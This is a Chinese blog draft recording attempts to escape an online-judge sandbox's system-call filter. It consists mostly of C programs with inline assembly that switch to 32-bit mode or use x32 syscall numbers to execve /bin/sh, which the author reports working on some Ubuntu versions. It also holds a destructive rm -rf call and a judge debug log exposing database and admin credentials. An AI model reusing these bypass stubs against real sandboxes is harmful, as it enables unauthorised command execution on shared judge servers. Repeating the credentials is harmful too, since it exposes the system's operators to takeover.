失败的挖洞经历,懒得写博客了,草稿放上来吧。

#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>
int main() {
        int ret;
    char *cmd[] = { "ls", "-l", (char *)0 };
    char *env[] = { "HOME=/usr/home", "LOGNAME=home", (char *)0 };
    ret = execve ("/bin/ls", cmd, env);
        printf("%d", ret);
}
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>
int main() {
        int ret;
    char *cmd[] = { "ls", "-l", (char *)0 };
    char *env[] = { "HOME=/usr/home", "LOGNAME=home", (char *)0 };
    ret = syscall (59, "/bin/ls", cmd, env);
        printf("%d", ret);
}
ls_shellcode = '''
import os

dst_path = '{dst_path}'

dirs = os.listdir(dst_path)

for file in dirs:
    print(file)

'''
exec(ls_shellcode.format(dst_path = "./"))

judge_client 1015 1000 /home/judge debug

ptrace

#include <stdio.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/reg.h>   /* For constants ORIG_RAX etc */
int main(){
   pid_t child;
   long orig_rax;
   child=fork();
   if(child==0){
      ptrace(PTRACE_TRACEME,0,NULL,NULL);
      execl("/bin/ls","ls",NULL);
   }else{
        wait(NULL);
        orig_rax = ptrace(PTRACE_PEEKUSER,child,8*ORIG_RAX,NULL);
        printf("The child made a system call %ld\n",orig_rax);
        ptrace(PTRACE_CONT,child,NULL,NULL);
   }
}

devc++ asm

#include <stdio.h>
/*
int main(){
    char s[] = "A";
    printf(s); 
    return 0;
}
*/

int main(){
    char s[] = "A";
    __asm__ (
        "lea %eax, s"
        "push %eax"
        "call printf"
        );
    return 0;
} 

at&t

objdump -d test.exe > test.asm

00000000004014f0 <main>:
  4014f0:    55                       push   %rbp
  4014f1:    48 89 e5                 mov    %rsp,%rbp
  4014f4:    48 83 ec 30              sub    $0x30,%rsp
  4014f8:    e8 63 90 00 00           callq  40a560 <__main>
  4014fd:    66 c7 45 f0 41 00        movw   $0x41,-0x10(%rbp)
  401503:    48 8d 45 f0              lea    -0x10(%rbp),%rax
  401507:    48 89 c1                 mov    %rax,%rcx
  40150a:    e8 09 a1 00 00           callq  40b618 <printf>
  40150f:    b8 00 00 00 00           mov    $0x0,%eax
  401514:    eb 08                    jmp    40151e <main+0x2e>
  401516:    48 89 c1                 mov    %rax,%rcx
  401519:    e8 52 9c 00 00           callq  40b170 <_Unwind_Resume>
  40151e:    48 83 c4 30              add    $0x30,%rsp
  401522:    5d                       pop    %rbp
  401523:    c3                       retq   

strace

iyzyi@ubuntu:~$ strace ls
execve("/usr/bin/ls", ["ls"], 0x7ffd98ce0090 /* 51 vars */) = 0
brk(NULL)                               = 0x55f9422e7000
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffe9f51f920) = -1 EINVAL (Invalid argument)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=76412, ...}) = 0
mmap(NULL, 76412, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fc7704ab000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libselinux.so.1", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@p\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=163200, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc7704a9000
mmap(NULL, 174600, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fc77047e000
mprotect(0x7fc770484000, 135168, PROT_NONE) = 0
mmap(0x7fc770484000, 102400, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7fc770484000
mmap(0x7fc77049d000, 28672, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1f000) = 0x7fc77049d000
mmap(0x7fc7704a5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fc7704a5000
mmap(0x7fc7704a7000, 6664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fc7704a7000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360q\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\363\377?\332\200\270\27\304d\245n\355Y\377\t\334"..., 68, 880) = 68
fstat(3, {st_mode=S_IFREG|0755, st_size=2029224, ...}) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\363\377?\332\200\270\27\304d\245n\355Y\377\t\334"..., 68, 880) = 68
mmap(NULL, 2036952, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fc77028c000
mprotect(0x7fc7702b1000, 1847296, PROT_NONE) = 0
mmap(0x7fc7702b1000, 1540096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7fc7702b1000
mmap(0x7fc770429000, 303104, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x19d000) = 0x7fc770429000
mmap(0x7fc770474000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7fc770474000
mmap(0x7fc77047a000, 13528, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fc77047a000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre2-8.so.0", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\"\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=584392, ...}) = 0
mmap(NULL, 586536, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fc7701fc000
mmap(0x7fc7701fe000, 409600, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fc7701fe000
mmap(0x7fc770262000, 163840, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x66000) = 0x7fc770262000
mmap(0x7fc77028a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x8d000) = 0x7fc77028a000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0 \22\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=18816, ...}) = 0
mmap(NULL, 20752, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fc7701f6000
mmap(0x7fc7701f7000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1000) = 0x7fc7701f7000
mmap(0x7fc7701f9000, 4096, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7fc7701f9000
mmap(0x7fc7701fa000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7fc7701fa000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\201\0\0\0\0\0\0"..., 832) = 832
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0O\305\3743\364B\2216\244\224\306@\261\23\327o"..., 68, 824) = 68
fstat(3, {st_mode=S_IFREG|0755, st_size=157224, ...}) = 0
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0O\305\3743\364B\2216\244\224\306@\261\23\327o"..., 68, 824) = 68
mmap(NULL, 140408, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fc7701d3000
mmap(0x7fc7701da000, 69632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7fc7701da000
mmap(0x7fc7701eb000, 20480, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x18000) = 0x7fc7701eb000
mmap(0x7fc7701f0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1c000) = 0x7fc7701f0000
mmap(0x7fc7701f2000, 13432, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fc7701f2000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc7701d1000
arch_prctl(ARCH_SET_FS, 0x7fc7701d2400) = 0
mprotect(0x7fc770474000, 12288, PROT_READ) = 0
mprotect(0x7fc7701f0000, 4096, PROT_READ) = 0
mprotect(0x7fc7701fa000, 4096, PROT_READ) = 0
mprotect(0x7fc77028a000, 4096, PROT_READ) = 0
mprotect(0x7fc7704a5000, 4096, PROT_READ) = 0
mprotect(0x55f9404fd000, 4096, PROT_READ) = 0
mprotect(0x7fc7704eb000, 4096, PROT_READ) = 0
munmap(0x7fc7704ab000, 76412)           = 0
set_tid_address(0x7fc7701d26d0)         = 13849
set_robust_list(0x7fc7701d26e0, 24)     = 0
rt_sigaction(SIGRTMIN, {sa_handler=0x7fc7701dabf0, sa_mask=[], sa_flags=SA_RESTORER|SA_SIGINFO, sa_restorer=0x7fc7701e83c0}, NULL, 8) = 0
rt_sigaction(SIGRT_1, {sa_handler=0x7fc7701dac90, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART|SA_SIGINFO, sa_restorer=0x7fc7701e83c0}, NULL, 8) = 0
rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
statfs("/sys/fs/selinux", 0x7ffe9f51f870) = -1 ENOENT (No such file or directory)
statfs("/selinux", 0x7ffe9f51f870)      = -1 ENOENT (No such file or directory)
brk(NULL)                               = 0x55f9422e7000
brk(0x55f942308000)                     = 0x55f942308000
openat(AT_FDCWD, "/proc/filesystems", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
read(3, "nodev\tsysfs\nnodev\ttmpfs\nnodev\tbd"..., 1024) = 378
read(3, "", 1024)                       = 0
close(3)                                = 0
access("/etc/selinux/config", F_OK)     = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=14537584, ...}) = 0
mmap(NULL, 14537584, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fc76f3f3000
close(3)                                = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=38, ws_col=125, ws_xpixel=0, ws_ypixel=0}) = 0
openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents64(3, /* 39 entries */, 32768)  = 1208
getdents64(3, /* 0 entries */, 32768)   = 0
close(3)                                = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}) = 0
write(1, "1.py\tctf\t Documents  get-pip.py\t"..., 981.py    ctf     Documents  get-pip.py               misc   oj    Public    re    tasm.cpp     test       test.c    Videos
) = 98
write(1, "crypto\tDesktop  Downloads  insta"..., 110crypto    Desktop  Downloads  install-ubuntu20-gitee.sh  Music  Pictures    pwn    snap  Templates  test.asm  test.exe
) = 110
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++
iyzyi@ubuntu:~$ 

?

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

extern void my_execve(char *,char**,char**);            //为了学习方便,将shellcode直接编入
char *args[]={
//    "/usr/bin/id",
    "/bin/sh",
    0
};
int main()
{
    printf(":Beta~\n");
    //my_execve(args[0],args,0);
    execve(args[0],args,0);
    return 0;
}
/*
接下来的shellcode部分:
​```asm
section .text
global my_execve

my_execve:
    lea rsp,[stk]       ;;如下所述,防止内存访问异常
    call to32           ;;转换为32位
    mov eax,11          ;;32位的sys_execve 64位的sys_munmap
    mov ebx,edi         ;;32位和64位参数所用寄存器不同需要手动修改
    mov ecx,esi
    mov edx,edx
    int 0x80            ;;32位不能使用syscall,只能使用此指令
    ret
to32:
    mov DWORD [rsp+4],0x23
    retf

section .bss            ;;这里创建了一个栈,因为to32后rsp只有低位也就是esp有效了,若不这样做它将会指向一个不可访问的区域,这将会导致访问异常
    resb 1000           ;;在实际利用过程中找到一个可访问的低位地址就好了
stk:
*/

success run in ubuntu1804

and success run in ubuntu1604

but fail in ubuntu2004

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

//extern void my_execve(char *,char**,char**);            //为了学习方便,将shellcode直接编入
char *args[]={
//    "/usr/bin/id",
    "/bin/sh",
    0
};

void my_execve(char * a,char** b,char** c){
    __asm__ (
    "mov $0x4000003b, %rax\n\t"
    "syscall\n\t"
    "nop\n\t"
    "nop\n\t"
    "hlt\n\t"
    );
}

int main()
{
    printf(":Beta~\n");
    my_execve(args[0],args,0);
    //execve(args[0],args,0);
    return 0;
}


/*
接下来的shellcode部分:
​```asm
section .text
global my_execve

my_execve:
    lea rsp,[stk]       ;;如下所述,防止内存访问异常
    call to32           ;;转换为32位
    mov eax,11          ;;32位的sys_execve 64位的sys_munmap
    mov ebx,edi         ;;32位和64位参数所用寄存器不同需要手动修改
    mov ecx,esi
    mov edx,edx
    int 0x80            ;;32位不能使用syscall,只能使用此指令
    ret
to32:
    mov DWORD [rsp+4],0x23
    retf

section .bss            ;;这里创建了一个栈,因为to32后rsp只有低位也就是esp有效了,若不这样做它将会指向一个不可访问的区域,这将会导致访问异常
    resb 1000           ;;在实际利用过程中找到一个可访问的低位地址就好了
stk:
*/
#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

char *args[]={
    "/bin/sh",
    0
};

void my_execve(char * a,char** b,char** c){
    __asm__ (
    "mov $0x4000003b, %rax\n\t"
    "syscall\n\t"
    "nop\n\t"
    "nop\n\t"
    "hlt\n\t"
    );
}

int main()
{
    printf(":Beta~\n");
    my_execve(args[0],args,0);
    //execve(args[0],args,0);
    return 0;
}

success in ubuntu1804

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

//extern void my_execve(char *,char**,char**);            //为了学习方便,将shellcode直接编入
char *args[]={
//    "/usr/bin/id",
    "/bin/sh",
    0
};


static int __attribute__((used)) stk[100];


void my_execve(char * a,char** b,char** c){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"
    "call to32\n\t"
    "mov $11, %eax\n\t"
    "mov %edi, %ebx\n\t"
    "mov %esi, %ecx\n\t"
    "mov %edx, %edx\n\t"
    "int $0x80\n\t"
    "ret\n\t"

    "to32:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"
    );
}

int main()
{
    printf(":Beta~\n");
    //__asm__ (
    //"int $3\n\t"
    //);
    my_execve(args[0],args,0);
    //execve(args[0],args,0);
    return 0;
}


/*
接下来的shellcode部分:
​```asm
section .text
global my_execve

my_execve:
    lea rsp,[stk]       ;;如下所述,防止内存访问异常
    call to32           ;;转换为32位
    mov eax,11          ;;32位的sys_execve 64位的sys_munmap
    mov ebx,edi         ;;32位和64位参数所用寄存器不同需要手动修改
    mov ecx,esi
    mov edx,edx
    int 0x80            ;;32位不能使用syscall,只能使用此指令
    ret
to32:
    mov DWORD [rsp+4],0x23
    retf

section .bss            ;;这里创建了一个栈,因为to32后rsp只有低位也就是esp有效了,若不这样做它将会指向一个不可访问的区域,这将会导致访问异常
    resb 1000           ;;在实际利用过程中找到一个可访问的低位地址就好了
stk:
*/

http://www.cocoachina.com/articles/76624

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

//extern void my_execve(char *,char**,char**);            //为了学习方便,将shellcode直接编入
char *args[]={
//    "/usr/bin/id",
    "/bin/ls",
    0
};

static int __attribute__((used)) stk[100];

void my_execve(char * a,char** b,char** c){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"
    "call to32\n\t"
    "mov $11, %eax\n\t"
    "mov %edi, %ebx\n\t"
    "mov %esi, %ecx\n\t"
    "mov %edx, %edx\n\t"
    "int $0x80\n\t"
    "ret\n\t"

    "to32:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"
    );
}

int main()
{
    printf(":Beta~\n");
    my_execve(args[0],args,0);
    //execve(args[0],args,0);
    return 0;
}

gcc 32.c -o 32 -O2 -fmax-errors=10 -Wall -lm --static -std=c99 -DONLINE_JUDGE

execve参数de'mo

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

//extern void my_execve(char *,char**,char**);            //为了学习方便,将shellcode直接编入
char *args[]={
//    "/usr/bin/id",
    "-rf","user.out",
    0
};

static int __attribute__((used)) stk[100];
/*
int my_execve(char * a,char** b,char** c){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"
    "call to32\n\t"
    "mov $11, %eax\n\t"
    "mov %edi, %ebx\n\t"
    "mov %esi, %ecx\n\t"
    "mov %edx, %edx\n\t"
    "int $0x80\n\t"
    "ret\n\t"

    "to32:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"
    );
}*/

int main()
{
    printf(":Beta~\n");
    //int ret = my_execve(args[0],args,0);
    execve("/bin/rm",args,0);
    //printf("%d\n", ret);
    return 0;
}

gcc 32.c -o 32 -fmax-errors=10 -Wall -lm --static -std=c99 -DONLINE_JUDGE

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
 
//extern void my_execve(char *,char**,char**);            //为了学习方便,将shellcode直接编入
char *args[]={
//    "/usr/bin/id",
    "/bin/ls",
    0
};
 
static int __attribute__((used)) stk[100];
 
void my_execve(char * a,char** b,char** c){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"
    "call 0f\n\t"
    "mov $11, %eax\n\t"
    "mov %edi, %ebx\n\t"
    "mov %esi, %ecx\n\t"
    "mov %edx, %edx\n\t"
    "int $0x80\n\t"
    "ret\n\t"
 
    "0:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"
    );
}
 
int main()
{
    printf(":Beta~\n");
    my_execve(args[0],args,0);
    //execve(args[0],args,0);
    return 0;
}

fork - 运行错误Runtime

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
 
char *args[]={
    "Main",
    0
};
 
static int __attribute__((used)) stk[100];
 
__attribute__((naked)) int my_fork(){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"

    "call 0f\n\t"

    "mov $2, %eax\n\t"
    "int $0x80\n\t"

    "call 1f\n\t"
    "movq 8(%rbp), %rbx\n\t"
    "movq %rbx, (%rsp)\n\t"
    "ret\n\t"
 
    "0:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"

    "1:\n\t"
    "movl $0x33, 4(%rsp)\n\t"
    "retf\n\t"
    );
}
 
int main()
{
    printf(":Beta~\n");

    int pid = my_fork();
    
    if (pid){
        printf("parent\n");
    }
    else{
        printf("child\n");
    }
    
    return 0;
}

image-20201121022247071

root@ubuntu:/home/judge/run1000/log# judge_client 1037 1000 /home/judge debug
OJ_HOST_NAME=127.0.0.1
OJ_USER_NAME=debian-sys-maint
OJ_PASSWORD=byIOjjezfldhgnMB
OJ_DB_NAME=jol
OJ_PORT_NUMBER=3306
OJ_JAVA_TIME_BONUS=2
OJ_JAVA_MEMORY_BONUS=64
OJ_JAVA_XMS=-Xms64M
OJ_JAVA_XMX=-Xmx128M
OJ_SIM_ENABLE=0
OJ_HTTP_JUDGE=0
OJ_HTTP_BASEURL=http://127.0.0.1/JudgeOnline
OJ_HTTP_USERNAME=admin
OJ_HTTP_PASSWORD=admin
OJ_HTTP_DOWNLOAD=1
OJ_OI_MODE=1
OJ_SHM_RUN=0
OJ_USE_MAX_TIME=0
OJ_TIME_LIMIT_TO_TOTAL=0
OJ_COMPILE_CHROOT=0
OJ_TURBO_MODE=0
OJ_CPU_COMPENSATION=0.92
OJ_PYTHON_FREE=0
mkdir /home/judge/run1000/
mkdir: cannot create directory ‘/home/judge/run1000/’: File exists
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
/bin/mv /home/judge/run1000//* /home/judge/run1000//log/ 2>/dev/null
cid:0
Main=chown judge /home/judge/run1000//Main.c
time: 1 mem: 128
[iyzyi compile]****************
[iyzyi pid] 64949****************
[iyzyi pid] 0****************
/bin/chown judge /home/judge/run1000/ 
/bin/chmod 750 /home/judge/run1000/ 
[iyzyi compile_chroot] 0****************
status=0
/bin/umount -f bin usr lib lib64 etc/alternatives proc dev 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/cp '/home/judge/data/1000/test.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=65011 judging /home/judge/data/1000/test.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -3
[iyzyi exitcode] 11****************
status>>8=11
/1000/test.in: mem=1073152 time=0
time:0/0
/bin/cp '/home/judge/data/1000/sample.in' /home/judge/run1000//data.in
/bin/cp /home/judge/data/1000/*.dic /home/judge/run1000// 2>/dev/null
init_call_counter:0
SYS_execve:59
pid=65016 judging /home/judge/data/1000/sample.in
[iyzyi exitcode] 5****************
[iyzyi] call_counter[59] : 0
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -4
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -5
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[158] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[63] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[89] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -6
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -7
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -8
[iyzyi exitcode] 133****************
[iyzyi] call_counter[12] : -9
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[21] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[5] : -3
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -2
[iyzyi exitcode] 133****************
[iyzyi] call_counter[2] : -3
[iyzyi exitcode] 11****************
status>>8=11
/1000/sample.in: mem=1073152 time=0
time:0/0
add RE info of 1037..... 
use total time:0
[iyzyi oi_mode] 1****************
ACflg:4
finalACflg:10
sql:[UPDATE `problem` SET `accepted`=(SELECT count(*) FROM `solution` WHERE `problem_id`=1000 AND `result`=4) WHERE `problem_id`=1000]
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//dev 2>/dev/null
/bin/umount -f /home/judge/run1000//lib 2>/dev/null
/bin/umount -f /home/judge/run1000//lib64 2>/dev/null
/bin/umount -f /home/judge/run1000//etc/alternatives 2>/dev/null
/bin/umount -f /home/judge/run1000//usr 2>/dev/null
/bin/umount -f /home/judge/run1000//bin 2>/dev/null
/bin/umount -f /home/judge/run1000//proc 2>/dev/null
/bin/umount -f /home/judge/run1000//* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/* 2>/dev/null
/bin/umount -f /home/judge/run1000//log/etc/alternatives 2>/dev/null
/bin/rm -rf /home/judge/run1000//log/* 2>/dev/null
mkdir /home/judge/run1000//log/ 2>/dev/null
